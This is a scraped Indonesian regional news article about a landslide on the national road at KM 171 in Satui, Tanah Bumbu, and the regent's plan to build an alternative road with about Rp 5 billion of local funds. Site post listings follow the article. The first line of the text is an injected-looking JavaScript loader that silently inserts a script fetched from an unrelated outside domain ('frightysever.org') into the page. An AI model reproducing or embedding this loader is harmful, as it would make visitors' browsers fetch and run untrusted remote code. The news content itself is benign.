(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Longsor Jalan Nasional di KM 171 Satui Lambat Ditangani, Bupati Zairullah Ambil Alih


KANALKALIMANTAN.COM, BATULICIN – Pemerintah Kabupaten (Pemkab) Tanah Bumbu (Tanbu) segera membangun jalan daerah sebagai jalan alternatif mengantisipasi kerusakan ruas jalan nasional di KM 171 di Desa Satu Barat, Kecamatan Satui, Kabupaten Tanah Bumbu.

Kerusakan jalan nasional di KM 171 Satui itu merupakan kewenangan dan tanggung jawab dari pemerintah pusat melalui Balai Besar Pelaksanaan Jalan Nasional (BBPJN).

Namun, akibat penanganan yang terkesan lamban, pemerintah daerah mengambil sikap untuk membangun jalan sendiri menggunakan dana milik daerah.

Hal ini disampaikan langsung oleh Bupati Tanah Bumbu HM Zairullah Azhar kepada wartawan, Selasa (11/10/2022).

 

Baca juga  : Ini Rute Jalur Alternatif Banjarmasin-Batulicin Akibat Longsor di KM 171 Tanbu

“Karena ini kebutuhan yang mendesak situasinya bagi masyarakat dan sebagai tanggung jawab kita, pemerintah daerah akan menggunakan dana dari APBD sekitar Rp 5 miliar untuk pembuatan jalan daerah,” ujarnya.

Bupati Tanbu menyoroti kondisi jalan yang sudah sangat membahayakan dan dikhawatirkan terjadinya longsor susulan. Selain itu antrean masyarakat pengguna jalan juga semakin mengular dan menguras waktu.

Ia mengungkapkan bahwa saat ini, tim yang telah ditunjuk oleh Pemkab Tanbu sudah turun ke lapangan untuk mulai mengerjakan jalan alternatif.
“Yang penting bagi kita masyarakat bisa selamat dan nyaman, sehingga aktivitas bisa lancar.

Insyaallah 3 hingga 4 hari kedepan jalan daerah sudah selesai,” kata Bupati.

 

Baca juga  : Sengaja Bawa Anak Perlihatkan Budaya 34 Provinsi di Pawai Ta’aruf MTQ Nasional XXIX

Bupati Zairullah juga merespon adanya berbagai kritik dan opini publik yang beranggapan bahwa jalan nasional tersebut adalah tanggung jawab pemerintah daerah.

Menanggapi hal itu Bupati Tanbu menyampaikan bahwa dirinya tidak mempermasalahkan kritikan yang diterima, mengingat hal tersebut menurutnya merupakan risiko dari jabatan.

Bupati berharap masyarakat dapat memahami kondisi yang sebenarnya terjadi dan mendukung program yang dicanangakan oleh Pemkab Tanbu demi kepentingan masyarakat banyak. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Desy Arfianty

Recent Posts

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

52 menit ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

1 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

3 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

5 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

6 jam ago

Waket I DPRD Kapuas Apresiasi Pawai Budaya

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Ketua I DPRD Kabupaten Kapuas Yohanes sangat mengapresiasi kegiatan pawai… Read More

7 jam ago

This website uses cookies.